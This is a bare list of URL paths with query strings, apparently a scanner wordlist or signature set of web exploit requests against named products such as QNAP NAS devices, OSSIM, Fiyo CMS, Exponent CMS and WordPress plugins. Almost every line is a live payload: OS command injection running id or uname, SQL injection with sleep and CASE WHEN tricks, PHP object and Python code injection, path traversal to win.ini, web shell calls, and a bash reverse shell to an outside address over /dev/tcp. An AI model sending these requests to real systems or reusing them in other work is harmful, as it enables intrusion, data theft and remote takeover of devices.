/ossim/pcap/download.php?scan_name=pass&sensor_ip=1.1.1.1
/cgi-bin/userConfig.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;uname%20-a)>%262`
/cgi-bin/filemanager/utilRequest.cgi?func=cancel_trash_recovery&sid=SIDVALUE&pid=`id>/tmp/pwned`
/fiyo/dapur/apps/app_article/controller/article_list.php?cat='%20orsleep(10)%20or%20'1&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1500268118960
/fiyo/dapur/apps/app_article/controller/article_status.php?fp=1&id=1'or'1
/fiyo/dapur/apps/app_article/controller/comment_status.php?stat=1&id=1'or'1
/fiyo/dapur/apps/app_comment/controller/comment_status.php?stat=1&id=1'or'1
/DesktopModules/C_Info/WebService/C_InfoService.asmx?SOAPAction:%20"https://tempuri.org/GetArticleHitsArray"%20<?xml%20version="1.0"%20encoding="utf-8"?>%20<soap:Envelope%20xmlns:xsi="https://www.w3.org/2001/XMLSchema-instance"%20xmlns:xsd="https://www.w3.org/2001/XMLSchema"%20xmlns:soap="https://schemas.xmlsoap.org/soap/envelope/">%20<soap:Body>%20<GetArticleHitsArray%20xmlns="https://tempuri.org/">%20<ArticleIDs>aaa’</ArticleIDs>%20</GetArticleHitsArray>%20</soap:Body>%20</soap:Envelope>
/api/saveconfig?key=__import__(%27os%27).system(%27touch%20%2Ftmp%2Fpy100%20%26%27)&value=10&_=1496061368064
/Embedded_Ace_Set_Task.cgi?$'5003'
/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php
/wp-admin/admin-ajax.php?id=&action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1
/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
/ossim/dashboard/sections/widgets/data/image.php?type=test&wtype=blah&height=1&range=1&class=1&id=&adj=1&value=a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3Bs%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{s%3A9%3A%22%00*%00events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22%00*%00tags%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00*%00impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3Bs%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B}
/actionphp/action.input.php?&ActionForm=SendForm&TotalQuery=653&TotalCompiled=2&id=1`%20WHERE%20SLEEP(5)--%20aaa%20&idForm=1234567890
/subrion/actions.json?action=delete-file&item=members&itemid=1&field=emailor%20sleep(3)%20,username&file=123
/commit2.cgi?ADMIN_PASSWD=$1$ZZ0DVlc6$QLqFLzW8YDZObgHtMZrYF/
/seos/1000/find.api?method=x%27%60id>/tmp/zz%60%27&oauth_token=b
/responder.fcgi1?winid=106&winname=Users%20%26%20Groups&slot=1&mainslot=1
/responder.fcgi1?winid=109&winname=Users%20%26%20Groups&slot=1&mainslot=1
/responder.fcgi1?winid=103&winname=Users%20%26%20Groups&slot=1&mainslot=1
/responder.fcgi0?winid=89&winname=Users%20%26%20Groups&slot=0
/dcRedirect/dataChannelMsg.dc?%20<class%20DataPacket>%20[0]%20<instance%20pint.uint16_t%20'getHeaderSize'>%200x004e%20(78)%20[2]%20<instance%20pint.uint16_t%20'version'>%200x0001%20(1)%20[4]%20<instance%20pint.uint32_t%20'm_expiration'>%200x00000000%20(0)%20[8]%20<instance%20pint.uint32_t%20'CorrelationID'>%200x00000000%20(0)%20[c]%20<instance%20pint.uint8_t%20'getFlag'>%200x07%20(7)%20[d]%20<instance%20StringPacket%20'm_originNameBytes'>%20"x10x58x58x58x4fx52x49x47x49x4ex4ex41x4dx45x58x58x58"%20[1e]%20<instance%20StringPacket%20'm_messageTypeBytes'>%20"x11x58x58x58x4dx45x53x53x41x47x45x54x59x50x45x58x58x58"%20[30]%20<instance%20StringPacket%20'm_agentGUIDBytes'>%20"x0fx58x58x58x41x47x45x4ex54x47x55x49x44x58x58x58"%20[40]%20<instance%20Data%20'm_data'>%20"x0ax00x00x00x58x58x58x44x41x54x41x58x58x58"
/cgi-bin/dna/seqreq2N.cgi?username=61685578,2410
/web/google_analytics.php?cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23
/html/en/xprtCmd.html
/FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1&id=21+or+if(1,sleep(5),0)
/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL
/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff83e&param=action=cache%20name=MEMBER.1'];phpinfo();$a=['1
/index.php?c=weixin&m=sync&url=http://www.baidu.com
/fiyo/dapur/index.php?app=article&view=tag&act=edit&id=79&apply_tag=Simpan&id=79&name=1%22or%221&desc=1
/cgi-bin/HASync/hasync.cgi?debug=1
/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7
/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7
/index.php'%20or%201%3d2--%20
/index.php'%20OR%20SLEEP(1)--%20
/index.php'%20OR%20SLEEP(30)--%20
/expComment/showComments/content_id/11%20or%20sleep(10)
/categoriesServlet?start=0&count=10&sort=keywords%20LIMIT%20(SELECT%20CASE%20WHEN%20(1=1)%20THEN%201%20ELSE%20-1%20END)
/categoriesServlet?start=0&count=10&sort=keywords%20LIMIT%20(SELECT%20CASE%20WHEN%20(1=0)%20THEN%201%20ELSE%20-1%20END)
/courier/themes/templates/.ooxxooxx.php?ooxxooxx=echo`$_POST[ccc]`;&ccc=ls-alh
/courier/themes/templates/.ooxxooxx.php?ooxxooxx=echo`$_POST[ccc]`;&ccc=ls-alh/home/filex1/custom_template/1000/
/courier/B3dKe9sQaa0L.log
/ajax.cgi?action=tag_ipPing&pip=8.8.8.8%26echo%20test%20OS-Injection%26&cache=false&time=1498503087110
/simpleupload.py?$'returnpage=/&action=a&tns_appliance_session_token=61:62&tns_appliance_session_user=a"'%0abash%20-i%20>%26%20/dev/tcp/8.8.8.8/443%200>%261%0aecho%20'&
%60sleep+15%60/foo.rss
/cgi-bin/authLogin.cgi?reboot_notice_msg=$(printf%20'QNAPVJBD%08d%16s%20%2014`(echo;id)>&2`'%20$(expr%20$(date%20+%s)%20%%20100000000)%20Disconnect|base64|tr%20-d%20'rn')
/cgi-bin/diagnostics?tsrEmailCurrent=true&currentTSREmailTo=|date>/tmp/xort||a%20%23
/cgi-bin/diagnostics?tsrDeleteRestarted=true&tsrDeleteRestartedFile=|date>/tmp/xort2||a%20%23
/backdoor.php
/backdoor.php?cmd=d2hvYW1p
/zikula4/jcss.php?f=..........userdatatmp.txt
/cgi-bin/rftest.cgi?lang=en&src=AwServicesSetup.html&a=1&ATE_COMMAND=whoami&ATECHANNEL=&ATETXLEN=24&ATETXCNT=&ATETXMODE=&ATETXBW=&ATETXGI=&ATETXMCS=&ATETXANT=&ATERXANT=&ATERXFER=&ResetCounter=&ATEAUTOALC=&ATEIPG=&ATEPAYLOAD=&ATE=TXCONT
/es/index.php?option=com_virtuemart&view=categorysearch%27+%2F+sleep%285%29+%2F+%27&task=smartSearch
/sources/item.query.php?type=action_on_quick_icon&id=(SELECT%20(CASE%20WHEN%20(6144=6144)%20THEN%206144%20ELSE%206144*(SELECT%206144%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS)%20END))&action=1
/sources/view.query.php?type=connections_logs&order=(SELECT%20(CASE%20WHEN%20(6688=6688)%20THEN%206688%20ELSE%206688*(SELECT%206688%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS)%20END))&direction=DESC
/sources/view.query.php?type=errors_logs&order=date&direction=,%20%20(SELECT%20(CASE%20WHEN%20(1739=1739)%20THEN%201739%20ELSE%201739*(SELECT%201739%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS)%20END))
/ZCMS_1.1/ZCMS_1.1/?dir=login&username=admin&pass=HELL'%20OR%20'2'='2
/cgi-bin/dna/sysAdmin.cgi?$'investigator=&username=&navUserName=&investigator=&username=&executeCmdData=uname%20-a&Action=executeCmd'
/jq.php?action=loadtransactions&rows=5
/xml/system/setAttribute.xml?id=0&attr=protectAccess&newValue=0
/xml/system/control.xml?action=reboot
/xml/system/setAttribute.xml?id=0&attr=protectAccess&newValue=0
/xml/system/control.xml?action=reboot
/assets/php/formmailer/SendEmail.php::/assets/php/formmailer/functions.php
/fosagent/repl/download-file?basedir=4&filepath=....Windowswin.ini
/cgi-bin/CGIProxy.fcgi?cmd=asd&usr=asd&pwd=asd&remoteIp=`python%20-c%20"print%20('A'*266%20+%20'x9cx32')"`
/index.php?m=promote&f=index&v=search&_su=wuzhicms&fieldtype=place&keywords={sql%20payload}
/cms/manager/admin_ajax.php?action=getinfo&tab={pre}vod_topic&col=t_id&val=7291
/index.php/community/?wpfd=0&wpfob=relevancy&wpfo=desc%2c(select*from(select(sleep(20)))a)&wpfs=fff&wpfin=entire-posts
/~paioread/referrals.php?id=10&tier=1
/videosharing/search_video.php?search=123::/www/videosharing/viewsubs.php?chnlid=321
/taxibooking_new/admin/carlistedit.php?carid=36
/professional-service/admin/review.php?id=70
/arthi/multivendor/shopping-cart.php?cusid=60
/arthi/multivendor/my_wishlist.php?fid=60
/arthi/multivendor/seller-view.php?usid=60
/newsbee/30[payload]_news_thai_soccer_targets_asia_wide_goals.html
/editDisplaynames.do?method=editDisplaynames&resids=1)%20AND%202410=2410%20AND%20(5744=5744
/textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty=50&_txp_token=baa07ba857d3618ef810b725b9d4d9d8
/localhost/patch/remote.php?w=recomendar&id=BlindSQL
/sendrcpackage?keyid=-2544&keysymbol=-4081
/hy-cgi/device.cgi?cmd=searchlandevice
/wordpress/wp-admin/admin-ajax.php?tag_id=0&action=GalleryBox&current_view=0&image_id=1&gallery_id=1&theme_id=1&thumb_width=180&thumb_height=90&open_with_fullscreen=0&open_with_autoplay=0&image_width=800&image_height=500&image_effect=fade&sort_by=order&order_by=asc&enable_image_filmstrip=1&image_filmstrip_height=70&enable_image_ctrl_btn=1&enable_image_fullscreen=1&popup_enable_info=1&popup_info_always_show=0&popup_info_full_width=0&popup_hit_counter=0&popup_enable_rate=0&slideshow_interval=5&enable_comment_social=1&enable_image_facebook=1&enable_image_twitter=1&enable_image_google=1&enable_image_pinterest=0&enable_image_tumblr=0&watermark_type=none&current_url=p=1
/backend/main.php?area=con_configcat&idcat=1&idtplconf=0::/backend/main.php?area=plug&idclient=1
/categories-x.php?getcategories&sortkey=name)%20limit%201;--::/categories-x.php?getcategories&sortkey=name)%20limit%205;--
/videocat.php?url=test'%20AND%203383=3383%20AND%20'Odau'='Odau::/single.php?url=test'%20AND%203383=3383%20AND%20'Odau'='Odau
/modules/glossaire/glossaire-aff.php?lettre=A%20%and%20SELECT%20*%20FROM%20table1